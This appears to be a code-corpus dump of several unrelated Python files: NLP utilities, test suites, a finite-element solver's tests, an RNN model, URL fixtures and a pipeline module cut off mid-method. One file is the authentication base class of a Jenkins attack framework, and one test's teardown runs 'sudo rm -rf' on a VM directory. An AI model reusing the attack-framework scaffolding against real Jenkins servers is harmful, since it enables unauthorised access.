# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module containing various utility functions for MindMeld NLP Components.
"""
import importlib
import logging
import enum
from typing import Union, Optional, List
from collections import defaultdict
from ..exceptions import InvalidMaskError
logger = logging.getLogger(__name__)
def _is_module_available(module_name: str):
"""
checks if a module is available or not (eg. _is_module_available("sentence_transformers"))
Args:
module_name (str): name of the model to check
Returns:
bool, if or not the given module exists
"""
return bool(importlib.util.find_spec(module_name) is not None)
def _get_module_or_attr(module_name: str, func_name: str = None):
"""
Loads an attribute from a module or a module itself
(check if the module exists before calling this function)
"""
m = importlib.import_module(module_name)
if not func_name:
return m
if func_name not in dir(m):
raise ImportError(f"Cannot import {func_name} from {module_name}")
return getattr(m, func_name)
class MaskState(enum.Enum):
"""
This class encoded three NLP states:
unset: state when the user has neither allowed/denied the NLP component.
This state is needed to propagate state up/down the tree since we only
propagate state to unset nodes, never to user-defined nodes
allow: state when the user has explicitly allowed a node.
deny: state when the user has explicitly denied a node.
"""
unset = enum.auto()
allow = enum.auto()
deny = enum.auto()
def __bool__(self):
return self == self.allow
class TreeNode:
def __init__(self, nlp_name: str,
parent: Optional['TreeNode'] = None,
children: Optional[List['TreeNode']] = None,
mask_state: Optional[MaskState] = None):
"""
Constructor for the tree node
Args:
nlp_name: The name of the NLP component. eg. "weather"
is a name for a domain
parent: The parent of the NLP component. eg. parent of
an intent is a domain
children: The children of the NLP component. eg.
children of an intent are entities
mask_state: The mask state of the NLP component
"""
self.nlp_name = nlp_name
self.mask_state = mask_state
self.parent = parent
self.children = children or []
class TreeNlp:
"""
This data structure encodes a NLP tree hierarchy where each node
encodes a mask state, based on which certain NLP components are allowed
or denied based on user input
"""
def __init__(self, nlp, mask_state=MaskState.unset):
# root
self.root = TreeNode('root', mask_state=mask_state)
# construct NLP tree
for domain in nlp.domains:
domain_node = TreeNode(domain, parent=self.root, mask_state=mask_state)
self.root.children.append(domain_node)
for intent in nlp.domains[domain].intents:
intent_node = TreeNode(intent, parent=domain_node, mask_state=mask_state)
domain_node.children.append(intent_node)
entities = nlp.domains[domain].intents[intent].entities
for entity in entities:
entity_node = TreeNode(entity, parent=intent_node, mask_state=mask_state)
intent_node.children.append(entity_node)
for role in entities[entity].role_classifier.roles:
role_node = TreeNode(role, parent=intent_node, mask_state=mask_state)
entity_node.children.append(role_node)
@staticmethod
def _convert_tree_node_to_values(*nlp_components):
result = [None for _ in ['domain', 'intent', 'entity', 'role']]
for idx, component in enumerate(nlp_components):
component_name = component.nlp_name if isinstance(
component, TreeNode) else component
result[idx] = component_name
return result
def get_domain_nodes(self):
return self.root.children or []
def get_intent_nodes(self, domain: Union[str, TreeNode]):
domain, _, _, _ = self._convert_tree_node_to_values(domain)
for domain_node in self.root.children:
if domain_node.nlp_name == domain:
return domain_node.children
return []
def get_entity_nodes(self, domain: Union[str, TreeNode],
intent: Union[str, TreeNode]):
domain, intent, _, _ = self._convert_tree_node_to_values(domain, intent)
for intent_node in self.get_intent_nodes(domain):
if intent_node.nlp_name == intent:
return intent_node.children
return []
def get_role_nodes(self, domain: Union[str, TreeNode],
intent: Union[str, TreeNode],
entity: Union[str, TreeNode]):
domain, intent, entity, _ = self._convert_tree_node_to_values(
domain, intent, entity)
for entity_node in self.get_entity_nodes(domain, intent):
if entity_node.nlp_name == entity:
return entity_node.children
return []
def update(self, mask_state: bool,
domain: Union[str, TreeNode],
intent: Optional[Union[str, TreeNode]] = None,
entity: Optional[Union[str, TreeNode]] = None,
role: Optional[Union[str, TreeNode]] = None):
"""
This function updates the NLP tree with mask values. Note:
Args:
mask_state: True is mask off, False is mask on
domain: domain of NLP
intent: intent of NLP
entity: entity of NLP
role: role of NLP
"""
domain_name, intent_name, entity_name, role_name = self._convert_tree_node_to_values(
domain, intent, entity, role)
# validation check
nlp_components = [domain_name, intent_name, entity_name, role_name]
for i in range(1, len(nlp_components)):
if any(not component for component in nlp_components[:i]) and nlp_components[i]:
raise InvalidMaskError(
f"Unable to resolve NLP hierarchy since "
f"{str(nlp_components[i])} does not have an valid ancestor")
for domain_node in self.get_domain_nodes():
if domain_node.nlp_name != domain_name:
continue
if not intent_name:
domain_node.mask_state = mask_state
return
for intent_node in self.get_intent_nodes(domain_node.nlp_name):
if intent_name not in ('*', intent_node.nlp_name):
continue
if not entity_name:
intent_node.mask_state = mask_state
# If the intent is * and it's terminal, eg. "domain.*", then
# we mask the intent AND continue to iterate through the other
# intents of the domain
if intent_name == '*':
continue
# If the intent is not *, then it's terminal, eg. "domain.intent",
# then we mask the intent and end the function's operations
return
for entity_node in self.get_entity_nodes(domain_node.nlp_name,
intent_node.nlp_name):
if entity_name not in ('*', entity_node.nlp_name):
continue
if not role_name:
entity_node.mask_state = mask_state
# If the entity is * and it's terminal, eg. "domain.intent.*", then
# we mask the entity AND continue to iterate through the other
# entities of the intent
if entity_name == '*':
continue
# If the entity is not *, then it's terminal, eg. "domain.intent.entity",
# then we mask the entity and end the function's operations
return
for role_node in self.get_role_nodes(domain_node.nlp_name,
intent_node.nlp_name,
entity_node.nlp_name):
if role_name not in ('*', role_node.nlp_name):
continue
role_node.mask_state = mask_state
if role_name == '*':
continue
return
def _sync_nodes(self):
"""
This function does two actions sequentially:
1. down-flow: flow mask decisions down the tree
2. up-flow: flow mask decisions up the tree
Each node has three allow states: True, False and None. True and False
are explicitly set by the user while None is the default state.
For 1., if a parent is allowed, then all it's "eligible" descendant components
are allowed as well. An "eligible" component is a node set to None (ie non-user defined),
since a user might have explicitly set a child.
For 2., if all children of a NLP component are not allowed, then the parent
will not be allowed as well. When we do an up-flow, we update nodes regardless of being
explicitly set or not. This is because of the rule that if all the descendants are masked,
the parent should be masked as well, even if it's explicitly set to the contrary.
"""
for domain in self.get_domain_nodes():
intents = self.get_intent_nodes(domain)
for intent in intents:
# sync down
if domain.mask_state != MaskState.unset and \
intent.mask_state == MaskState.unset:
intent.mask_state = domain.mask_state
entities = self.get_entity_nodes(domain, intent)
for entity in entities:
# sync down
if intent.mask_state != MaskState.unset and \
entity.mask_state == MaskState.unset:
entity.mask_state = intent.mask_state
roles = self.get_role_nodes(domain, intent, entity)
for role in roles:
# sync down
if entity.mask_state != MaskState.unset and \
role.mask_state == MaskState.unset:
role.mask_state = entity.mask_state
# sync up entity-role
if roles and all(role.mask_state == MaskState.deny for role in roles):
entity.mask_state = MaskState.deny
# We do not perform sync ups for entities since tagger models cannot
# deny their parent text classification models. For example,
# just because the developer wants to deny all the entities in a particular
# intent, doesn't mean the intent should be denied as well.
# sync up domain-intent
if intents and all(intent.mask_state == MaskState.deny for intent in intents):
domain.mask_state = MaskState.deny
def _default_to_regular(self, d):
if isinstance(d, defaultdict):
d = {k: self._default_to_regular(v) for k, v in d.items()}
return d
def to_dict(self) -> dict:
"""
This function serializes TreeNlp into a dict structure by only adding keys representing
allow MaskState nodes and not adding keys for deny and unset MaskState nodes.
"""
self._sync_nodes()
# The results has three nested dicts: {domain: {intent: {entity: role: {}}}}
result = defaultdict(lambda: defaultdict(lambda: defaultdict(dict)))
for domain in self.get_domain_nodes():
if domain.mask_state:
result[domain.nlp_name] = defaultdict(lambda: defaultdict(dict))
for intent in self.get_intent_nodes(domain.nlp_name):
if intent.mask_state:
result[domain.nlp_name][intent.nlp_name] = defaultdict(dict)
for entity in self.get_entity_nodes(domain.nlp_name,
intent.nlp_name):
if entity.mask_state:
result[domain.nlp_name][intent.nlp_name][entity.nlp_name] = {}
for role in self.get_role_nodes(domain.nlp_name,
intent.nlp_name,
entity.nlp_name):
if role.mask_state:
result[domain.nlp_name][intent.nlp_name][
entity.nlp_name][role.nlp_name] = {}
serialize_results = self._default_to_regular(result)
return serialize_results
|
libs/JAF/BasePlugin.py | sc979/jenkins-attack-framework | 451 | 12663733 | import base64
import logging
import queue
import sys
from urllib.parse import urlparse
import requests.exceptions as req_exc
from libs import jenkinslib
def _logging_fatal(msg, *args, **kwargs):
logging.critical(msg, *args, **kwargs)
exit(1)
class HijackStdOut:
def __enter__(self):
# Preserve old stdout because we may already have hijacked it
self.old_stdout = sys.stdout
sys.stdout = sys.stderr
return sys.stdout
def __exit__(self, _type, value, traceback):
sys.stdout = self.old_stdout
class BasePlugin:
"""JAF Plugin Base Class"""
results_queue = queue.Queue()
jobs_queue = queue.Queue()
def __init__(self, args):
self.args = args
logging.basicConfig(format="%(asctime)s - %(message)s")
self.logging = logging.getLogger()
self.logging.fatal = _logging_fatal
self.server_url = urlparse(self.args.server)
if args.output_file:
try:
sys.stdout = open(args.output_file, "w")
except Exception:
self.logging.fatal("Specified Output File Path is invalid or inaccessible.")
def _get_jenkins_server(self, cred):
"""Setup initial connection to the jenkins server and handle authentication
:param cred: Credential dict"""
try:
if cred:
if "cookie" in cred:
return jenkinslib.Jenkins(
self.args.server,
cookie=cred["cookie"],
crumb=cred["crumb"],
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
elif "authheader" in cred:
return jenkinslib.Jenkins(
self.args.server,
authheader="Basic "
+ base64.b64encode(cred["authheader"].encode("utf8")).decode("ascii"),
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
else:
return jenkinslib.Jenkins(
self.args.server,
username=cred["username"],
password=cred["password"],
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
else:
return jenkinslib.Jenkins(
self.args.server,
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
except jenkinslib.JenkinsException as ex:
if "[403]" in str(ex).split("\n")[0]:
self.logging.fatal(
"%s authentication failed or no access", self._get_username(cred)
)
else:
self.logging.fatal(
"Unable to access Jenkins at: %s With User: %s For Reason:\n\t%s"
% (
(
self.server_url.netloc
if len(self.server_url.netloc) > 0
else self.args.server
),
self._get_username(cred),
str(ex).split("\n")[0],
)
)
except (req_exc.SSLError, req_exc.ConnectionError):
self.logging.fatal(
"Unable to connect to: "
+ (self.server_url.netloc if len(self.server_url.netloc) > 0 else self.args.server)
)
except Exception:
self.logging.exception("")
def _get_username(self, cred):
"""Utility function to return the user based on the cred type to display in error messages."""
if not cred:
return "Anonymous"
elif "username" in cred:
return cred["username"]
elif "authheader" in cred:
return cred["authheader"].split(":")[0]
elif not cred:
return "Anonymous"
else:
return "Cookie (User Unknown)"
def _validate_jenkins_server_accessible(self):
"""Utility function to return if we appear to have access to the jenkins server or not"""
# Catch inaccessible server before slamming a bunch of threads at it.
cred = None
server = self._get_jenkins_server(cred)
if server.basic_access_check() != 500:
return True
else:
return False
|
tests/integration/cli/assets_test.py | gamechanger/dusty | 421 | 12663734 | import os
import tempfile
import time
from dusty.systems.virtualbox import asset_is_set, run_command_on_vm
from dusty import constants
from dusty.source import Repo
from dusty.memoize import reset_memoize_cache
from ...testcases import DustyIntegrationTestCase
from ...fixtures import assets_fixture
class TestAssetsCLI(DustyIntegrationTestCase):
def setUp(self):
super(TestAssetsCLI, self).setUp()
assets_fixture()
self.run_command('repos override github.com/lib/a {}'.format(self.fake_local_repo_location))
self.required_app_file = tempfile.mkstemp()[1]
with open(self.required_app_file, 'w') as f:
f.write('required_app_contents')
self.optional_app_file = tempfile.mkstemp()[1]
with open(self.optional_app_file, 'w') as f:
f.write('optional_app_contents')
self.required_lib_file = tempfile.mkstemp()[1]
with open(self.required_lib_file, 'w') as f:
f.write('required_lib_contents')
self.optional_lib_file = tempfile.mkstemp()[1]
with open(self.optional_lib_file, 'w') as f:
f.write('optional_lib_contents')
self.run_command('bundles activate bundle-a')
self.run_command('assets set required_app_asset {}'.format(self.required_app_file))
self.run_command('assets set required_lib_asset {}'.format(self.required_lib_file))
def tearDown(self):
os.remove(self.required_app_file)
os.remove(self.required_lib_file)
os.remove(self.optional_app_file)
os.remove(self.optional_lib_file)
run_command_on_vm('sudo rm -rf {}'.format(constants.VM_ASSETS_DIR))
try:
self.run_command('stop --rm')
except:
pass
super(TestAssetsCLI, self).tearDown()
@DustyIntegrationTestCase.retriable_assertion(.1, 5)
def assertAssetContentsRetriable(self, container_path, asset_contents):
self.assertFileContentsInContainer('app-a', container_path, asset_contents)
def test_asset_in_container(self):
self.run_command('up --no-pull')
self.assertAssetContentsRetriable('/required_app_path', 'required_app_contents')
self.assertAssetContentsRetriable('/required_lib_path', 'required_lib_contents')
def test_required_asset_fail(self):
self.run_command('bundles activate bundle-a')
self.run_command('assets unset required_app_asset')
with self.assertRaises(self.CommandError):
output = self.run_command('up --no-pull')
def test_optional_asset(self):
self.run_command('assets set optional_app_asset {}'.format(self.optional_app_file))
self.run_command('assets set optional_lib_asset {}'.format(self.optional_lib_file))
self.run_command('up --no-pull')
self.assertAssetContentsRetriable('/optional_app_path', 'optional_app_contents')
self.assertAssetContentsRetriable('/optional_lib_path', 'optional_lib_contents')
def test_unset(self):
self.run_command('assets unset required_app_asset')
self.run_command('assets unset required_lib_asset')
reset_memoize_cache()
self.assertFalse(asset_is_set('required_app_asset'))
self.assertFalse(asset_is_set('required_lib_asset'))
def test_read(self):
with self.assertLogToClientOutput('required_app_contents'):
self.run_command('assets read required_app_asset')
with self.assertLogToClientOutput('required_lib_contents'):
self.run_command('assets read required_lib_asset')
|
Anaconda-files/Program_18a.py | arvidl/dynamical-systems-with-applications-using-python | 106 | 12663740 | # Program 18a: Generating a multifractal image.
# Save the image.
# See Figure 18.1(b).
import numpy as np
import matplotlib.pyplot as plt
from skimage import exposure, io, img_as_uint
p1, p2, p3, p4 = 0.3, 0.4, 0.25, 0.05
p = [[p1, p2], [p3, p4]]
for k in range(1, 9, 1):
M = np.zeros([2 ** (k + 1), 2 ** (k + 1)])
M.tolist()
for i in range(2**k):
for j in range(2**k):
M[i][j] = p1 * p[i][j]
M[i][j + 2**k] = p2 * p[i][j]
M[i + 2**k][j] = p3 * p[i][j]
M[i + 2**k][j + 2**k] = p4 * p[i][j]
p = M
# Plot the multifractal image.
M = exposure.adjust_gamma(M, 0.2)
plt.imshow(M, cmap='gray', interpolation='nearest')
# Save the image as a portable network graphics (png) image.
im = np.array(M, dtype='float64')
im = exposure.rescale_intensity(im, out_range='float')
im = img_as_uint(im)
io.imsave('Multifractal.png', im)
io.show()
|
utils/testing/base.py | maznu/peering-manager | 127 | 12663784 | import json
from ipaddress import IPv4Address, IPv4Interface, IPv6Address, IPv6Interface
from django.contrib.auth.models import Permission, User
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import FieldDoesNotExist
from django.db.models import ManyToManyField
from django.forms.models import model_to_dict
from django.test import Client
from django.test import TestCase as _TestCase
from requests.models import HTTPError
from rest_framework import status
from taggit.managers import TaggableManager
from .functions import extract_form_failures
class MockedResponse(object):
def __init__(
self, status_code=status.HTTP_200_OK, ok=True, fixture=None, content=None
):
self.status_code = status_code
if fixture:
self.content = self.load_fixture(fixture)
elif content:
self.content = json.dumps(content)
else:
self.content = None
self.ok = ok
def load_fixture(self, path):
with open(path, "r") as f:
return f.read()
def json(self):
return json.loads(self.content)
def raise_for_status(self):
if (
status.HTTP_400_BAD_REQUEST
<= self.status_code
<= status.HTTP_511_NETWORK_AUTHENTICATION_REQUIRED
):
raise HTTPError("", response=self)
class TestCase(_TestCase):
user_permissions = ()
def setUp(self):
# Create the test user and assign permissions
self.user = User.objects.create_user(username="testuser")
self.add_permissions(*self.user_permissions)
# Initialize the test client
self.client = Client()
self.client.force_login(self.user)
def add_permissions(self, *names):
"""
Assign a set of permissions to the test user.
Accepts permission names in the form <app>.<action>_<model>.
"""
for name in names:
app, codename = name.split(".")
perm = Permission.objects.get(
content_type__app_label=app, codename=codename
)
self.user.user_permissions.add(perm)
def remove_permissions(self, *names):
"""
Remove a set of permissions from the test user, if assigned.
"""
for name in names:
app, codename = name.split(".")
perm = Permission.objects.get(
content_type__app_label=app, codename=codename
)
self.user.user_permissions.remove(perm)
def assertHttpStatus(self, response, expected_status):
"""
Provide detail when receiving an unexpected HTTP response.
"""
err_message = None
# Construct an error message only if the test is going to fail
if response.status_code != expected_status:
if hasattr(response, "data"):
# REST API response; pass the response data through directly
err = response.data
else:
# Try to extract form validation errors from the response HTML
form_errors = extract_form_failures(response.content)
err = form_errors or response.content or "No data"
err_message = f"Expected HTTP status {expected_status}; received {response.status_code}: {err}"
self.assertEqual(response.status_code, expected_status, err_message)
class ModelTestCase(TestCase):
"""
Parent class for test cases which deal with models.
"""
model = None
def add_permissions(self, *names):
perms = []
for name in names:
perms.append(
f"{self.model._meta.app_label}.{name}_{self.model._meta.model_name}"
)
super().add_permissions(*perms)
def remove_permissions(self, *names):
perms = []
for name in names:
perms.append(
f"{self.model._meta.app_label}.{name}_{self.model._meta.model_name}"
)
super().add_permissions(*perms)
def _get_queryset(self):
"""
Returns a base queryset suitable for use in test methods.
"""
return self.model.objects.all()
def prepare_instance(self, instance):
"""
Override this method to perform manipulation of an instance prior to its
evaluation against test data.
"""
return instance
def model_to_dict(self, instance, fields, api=False):
"""
Returns a dictionary representation of an instance.
"""
# Prepare the instance and call Django's model_to_dict() to extract all fields
model_dict = model_to_dict(self.prepare_instance(instance), fields=fields)
# Map any additional (non-field) instance attributes that were specified
for attr in fields:
if hasattr(instance, attr) and attr not in model_dict:
model_dict[attr] = getattr(instance, attr)
for key, value in list(model_dict.items()):
try:
field = instance._meta.get_field(key)
except FieldDoesNotExist:
# Attribute is not a model field
continue
# Handle ManyToManyFields
if value and type(field) in (ManyToManyField, TaggableManager):
if field.related_model is ContentType:
model_dict[key] = sorted(
[f"{ct.app_label}.{ct.model}" for ct in value]
)
else:
model_dict[key] = sorted([obj.pk for obj in value])
if api and type(value) in (
IPv4Address,
IPv6Address,
IPv4Interface,
IPv6Interface,
):
model_dict[key] = str(value)
if api:
# Replace ContentType numeric IDs with <app_label>.<model>
if type(getattr(instance, key)) is ContentType:
ct = ContentType.objects.get(pk=value)
model_dict[key] = f"{ct.app_label}.{ct.model}"
return model_dict
def assertInstanceEqual(self, instance, data, exclude=None, api=False):
"""
Compares a model instance to a dictionary, checking that its attribute values
match those specified in the dictionary.
"""
if exclude is None:
exclude = []
fields = [k for k in data.keys() if k not in exclude]
model_dict = self.model_to_dict(instance, fields=fields, api=api)
# Omit any dictionary keys which are not instance attributes or have been excluded
relevant_data = {
k: v for k, v in data.items() if hasattr(instance, k) and k not in exclude
}
self.assertDictEqual(model_dict, relevant_data)
|
tests/test_integration.py | guillaumehuet/SolidsPy | 190 | 12663794 | # -*- coding: utf-8 -*-
"""
Integration tests for solidspy
"""
import numpy as np
from scipy.sparse.linalg import eigsh
import solidspy.postprocesor as pos
import solidspy.assemutil as ass
import solidspy.solutil as sol
def test_4_elements():
"""2×2 mesh with uniaxial load"""
nodes = np.array([
[0, 0, 0],
[1, 2, 0],
[2, 2, 2],
[3, 0, 2],
[4, 1, 0],
[5, 2, 1],
[6, 1, 2],
[7, 0, 1],
[8, 1, 1]])
cons = np.array([
[0, -1],
[0, -1],
[0, 0],
[0, 0],
[-1, -1],
[0, 0],
[0, 0],
[0, 0],
[0, 0]])
eles = np.array([
[0, 1, 0, 0, 4, 8, 7],
[1, 1, 0, 4, 1, 5, 8],
[2, 1, 0, 7, 8, 6, 3],
[3, 1, 0, 8, 5, 2, 6]])
loads = np.array([
[3, 0, 1],
[6, 0, 2],
[2, 0, 1]])
mater = np.array([[1.0, 0.3]])
assem_op, bc_array, neq = ass.DME(cons, eles)
stiff, _ = ass.assembler(eles, mater, nodes, neq, assem_op)
load_vec = ass.loadasem(loads, bc_array, neq)
disp = sol.static_sol(stiff, load_vec)
disp_complete = pos.complete_disp(bc_array, nodes, disp)
disp_analytic = np.array([
[ 0.6, 0.0],
[-0.6, 0.0],
[-0.6, 4.0],
[0.6, 4.0],
[0.0, 0.0],
[-0.6, 2.0],
[0.0, 4.0],
[0.6, 2.0],
[0.0, 2.0]])
assert np.allclose(disp_complete, disp_analytic)
def test_2_elements():
"""2x1 mesh cantilever beam"""
nodes = np.array([
[0, 0, 0],
[1, 1, 0],
[2, 2, 0],
[3, 0, 1],
[4, 1, 1],
[5, 2, 1]])
cons = np.array([
[-1, -1],
[0, 0],
[0, 0],
[-1, -1],
[0, 0],
[0, 0]])
eles = np.array([
[0, 1, 0, 0, 1, 4, 3],
[1, 1, 0, 1, 2, 5, 4]])
loads = np.array([
[2, 0, -0.5],
[5, 0, -0.5]])
mater = np.array([[1.0, 0.3]])
assem_op, bc_array, neq = ass.DME(cons, eles)
stiff, _ = ass.assembler(eles, mater, nodes, neq, assem_op)
load_vec = ass.loadasem(loads, bc_array, neq)
disp = sol.static_sol(stiff, load_vec)
disp_complete = pos.complete_disp(bc_array, nodes, disp)
disp_analytic = 1/45 * np.array([
[0, 0],
[-273, -390],
[-364, -1144],
[0, 0],
[273, -390],
[364, -1144]])
assert np.allclose(disp_complete, disp_analytic)
def test_beams():
"""Beams with axial force"""
# Analytic problem
nodes = np.array([
[0, 0.0, 0.0],
[1, 0.0, 6.0],
[2, 4.0, 6.0]])
cons = np.array([
[-1, -1, -1],
[0, 0, 0],
[-1, -1, -1]])
mats = np.array([[200e9, 1.33e-4, 0.04]])
elements = np.array([
[0, 8, 0, 0, 1],
[1, 8, 0, 1, 2]])
loads = np.array([
[1, -12000, -24000, -6000]])
assem_op, bc_array, neq = ass.DME(cons, elements, ndof_node=3)
stiff, _ = ass.assembler(elements, mats, nodes, neq, assem_op,
sparse=False)
load_vec = ass.loadasem(loads, bc_array, neq, ndof_node=3)
solution = sol.static_sol(stiff, load_vec)
solution_analytic = np.array([-6.29e-6, -1.695e-5, -0.13e-3])
assert np.allclose(solution, solution_analytic, rtol=1e-1)
def test_eigs_truss():
"""Eigenvalues of a bar"""
nnodes = 513
x = np.linspace(0, np.pi, nnodes)
nodes = np.zeros((nnodes, 3))
nodes[:, 0] = range(nnodes)
nodes[:, 1] = x
cons = np.zeros((nnodes, 2))
cons[:, 1] = -1
cons[0, 0] = -1
cons[-1, 0] = -1
mats = np.array([[1.0, 1.0, 1.0]])
elements = np.zeros((nnodes - 1, 5 ), dtype=int)
elements[:, 0] = range(nnodes - 1)
elements[:, 1] = 6
elements[:, 3] = range(nnodes - 1)
elements[:, 4] = range(1, nnodes)
assem_op, bc_array, neq = ass.DME(cons, elements)
stiff, mass = ass.assembler(elements, mats, nodes, neq, assem_op)
vals, _ = eigsh(stiff, M=mass, which="SM")
assert np.allclose(vals, np.linspace(1, 6, 6)**2, rtol=1e-2)
def test_eigs_beam():
"""Eigenvalues of a cantilever beam"""
nnodes = 10
x = np.linspace(0, np.pi, nnodes)
nodes = np.zeros((nnodes, 3))
nodes[:, 0] = range(nnodes)
nodes[:, 1] = x
cons = np.zeros((nnodes, 3))
cons[0, :] = -1
cons[:, 0] = -1
mats = np.array([[1.0, 1.0, 1.0, 1.0]])
elements = np.zeros((nnodes - 1, 5 ), dtype=int)
elements[:, 0] = range(nnodes - 1)
elements[:, 1] = 7
elements[:, 3] = range(nnodes - 1)
elements[:, 4] = range(1, nnodes)
assem_op, bc_array, neq = ass.DME(cons, elements, ndof_node=3)
stiff, mass = ass.assembler(elements, mats, nodes, neq, assem_op)
vals, _ = eigsh(stiff, M=mass, which="SM")
vals_analytic = np.array([0.596864162694467, 1.49417561427335,
2.50024694616670, 3.49998931984744,
4.50000046151508, 5.49999998005609])
assert np.allclose(vals**0.25, vals_analytic, rtol=1e-2)
|
malaya_speech/train/model/uis_rnn/model.py | ishine/malaya-speech | 111 | 12663803 | import tensorflow as tf
_INITIAL_SIGMA2_VALUE = 0.1
class CoreRNN(tf.keras.layers.Layer):
def __init__(
self,
observation_dim=256,
rnn_hidden_size=512,
rnn_depth=1,
rnn_dropout=0.0,
rnn_cell=tf.keras.layers.GRU,
**kwargs,
):
super(CoreRNN, self).__init__(name='CoreRNN', **kwargs)
# self.lstm = tf.keras.Sequential()
# for i in range(rnn_depth):
# self.lstm.add(
# tf.keras.layers.LSTM(
# rnn_hidden_size,
# return_sequences = True,
# return_state = True,
# kernel_regularizer = tf.keras.regularizers.l2(1e-5),
# recurrent_regularizer = tf.keras.regularizers.l2(1e-5),
# )
# )
self.lstm = tf.keras.layers.LSTM(
rnn_hidden_size,
return_sequences=True,
return_state=True,
kernel_regularizer=tf.keras.regularizers.l2(1e-5),
recurrent_regularizer=tf.keras.regularizers.l2(1e-5),
)
self.linear_mean1 = tf.keras.layers.Dense(
units=rnn_hidden_size,
dtype=tf.float32,
activation=tf.nn.relu,
kernel_regularizer=tf.keras.regularizers.l2(1e-5),
)
self.linear_mean2 = tf.keras.layers.Dense(
units=observation_dim,
dtype=tf.float32,
kernel_regularizer=tf.keras.regularizers.l2(1e-5),
)
def call(self, x, hidden=None, training=True):
output_seq = self.lstm(x, initial_state=hidden, training=training)
mean = self.linear_mean2(self.linear_mean1(output_seq[0]))
return mean, output_seq[1:]
class BeamState:
"""Structure that contains necessary states for beam search."""
def __init__(self, source=None):
if not source:
self.mean_set = []
self.hidden_set = []
self.neg_likelihood = 0
self.trace = []
self.block_counts = []
else:
self.mean_set = source.mean_set.copy()
self.hidden_set = source.hidden_set.copy()
self.trace = source.trace.copy()
self.block_counts = source.block_counts.copy()
self.neg_likelihood = source.neg_likelihood
def append(self, mean, hidden, cluster):
"""Append new item to the BeamState."""
self.mean_set.append(mean.clone())
self.hidden_set.append(hidden.clone())
self.block_counts.append(1)
self.trace.append(cluster)
class Model(tf.keras.Model):
def __init__(
self,
observation_dim=256,
rnn_hidden_size=512,
rnn_depth=1,
rnn_dropout=0.0,
sigma2=None,
transition_bias=None,
crp_alpha=1.0,
**kwargs,
):
super(Model, self).__init__(name='uis-rnn', **kwargs)
self.rnn_model = CoreRNN(
observation_dim, rnn_hidden_size, rnn_depth, rnn_dropout
)
self.estimate_sigma2 = sigma2 is None
self.estimate_transition_bias = transition_bias is None
sigma2 = _INITIAL_SIGMA2_VALUE if self.estimate_sigma2 else args.sigma2
self.sigma2 = sigma2 * tf.get_variable(
name='sigma2',
shape=[observation_dim],
initializer=tf.ones_initializer(),
)
self.transition_bias = transition_bias
self.transition_bias_denominator = 0.0
self.crp_alpha = crp_alpha
def call(self, x, hidden=None, training=True):
return self.rnn_model(x, hidden=hidden, training=training)
|
tests/url_fixtures.py | shibli049/expynent | 438 | 12663807 | <filename>tests/url_fixtures.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
INVALID_URLS = [
'http://',
'http://.',
'http://..',
'http://../',
'http://?',
'http://??',
'http://??/',
'http://#',
'http://##',
'http://##/',
'http://foo.bar?q=Spaces should be encoded',
'//',
'//a',
'///a',
'///',
'http:///a',
'foo.com',
'rdar://1234',
'h://test',
'http:// shouldfail.com',
':// should fail',
'http://foo.bar/foo(bar)baz quux',
'htto://foo.bar/',
'http://-error-.invalid/',
'http://-a.b.co',
'http://a.b-.co',
'http://.www.foo.bar/',
]
VALID_URLS = [
'http://foo.com/blah_blah', 'http://foo.com/blah_blah/',
'http://foo.com/blah_blah_(wikipedia)',
'http://foo.com/blah_blah_(wikipedia)_(again)',
'http://www.example.com/wpstyle/?p=364',
'https://www.example.com/foo/?bar=baz&inga=42&quux',
'http://172.16.31.10/',
'http://172.16.31.10:8080/',
'http://foo.com/blah_(wikipedia)#cite-132',
'http://foo.com/blah_(wikipedia)_blah#cite-1',
u'http://foo.com/unicode_(✪)_in_parens',
'http://foo.com/(something)?after=parens',
'http://sub.damowmow.com/',
'http://code.google.com/events/#&product=browser',
'http://j.mp', 'ftp://foo.bar/baz',
'http://foo.bar/?q=Test%20URL-encoded%20stuff',
'http://1337.net',
'http://a.b-c.de',
'http://172.16.58.3',
'http://a.b--c.de/',
]
|
mara_pipelines/commands/python.py | timgates42/mara-pipelines | 1,398 | 12663817 | """Commands for running python functions and scripts"""
import inspect
import shlex
import sys
import json
from html import escape
from typing import Union, Callable, List
from ..incremental_processing import file_dependencies
from ..logging import logger
from mara_page import html, _
from .. import pipelines
class RunFunction(pipelines.Command):
def __init__(self, function: Callable = None, args: [str] = None, file_dependencies: [str] = None) -> None:
"""
Runs an arbitrary python function
Args:
function: The parameterless function to run
args: A list of arguments to be passed to the script
file_dependencies: Run triggered based on whether a list of files changed since the last pipeline run
Note:
if you want to pass arguments, then use a lambda function
"""
self.function = function
self.args = args or []
self.file_dependencies = file_dependencies or []
def run(self) -> bool:
dependency_type = 'RunFunction ' + self.function.__name__
if self.file_dependencies:
assert (self.parent)
pipeline_base_path = self.parent.parent.base_path()
if not file_dependencies.is_modified(self.node_path(), dependency_type,
pipeline_base_path,
self.file_dependencies):
logger.log('no changes')
return True
if not self.function(*self.args):
return False
if self.file_dependencies:
file_dependencies.update(self.node_path(), dependency_type, pipeline_base_path, self.file_dependencies)
return True
def html_doc_items(self) -> [(str, str)]:
return [('function', _.pre[escape(str(self.function))]),
('args', _.tt[repr(self.args)]),
(_.i['implementation'], html.highlight_syntax(inspect.getsource(self.function), 'python')),
('file dependencies', [_.i[dependency, _.br] for dependency in self.file_dependencies])]
class ExecutePython(pipelines.Command):
def __init__(self, file_name: Union[Callable, str],
args: Union[Callable, List[str]] = None, file_dependencies: [str] = None) -> None:
"""
Runs a python script in a separate interpreter process
Args:
file_name: the path of the file to run, relative to the pipeline directory
args: A list of arguments to be passed to the script
file_dependencies: Run triggered based on whether a list of files changed since the last pipeline run
"""
self._file_name = file_name
self._args = args or []
self.file_dependencies = file_dependencies or []
@property
def file_name(self):
return self._file_name() if callable(self._file_name) else self._file_name
@property
def args(self):
return self._args() if callable(self._args) else self._args
def run(self) -> bool:
dependency_type = 'ExecutePython ' + self.file_name
if self.file_dependencies:
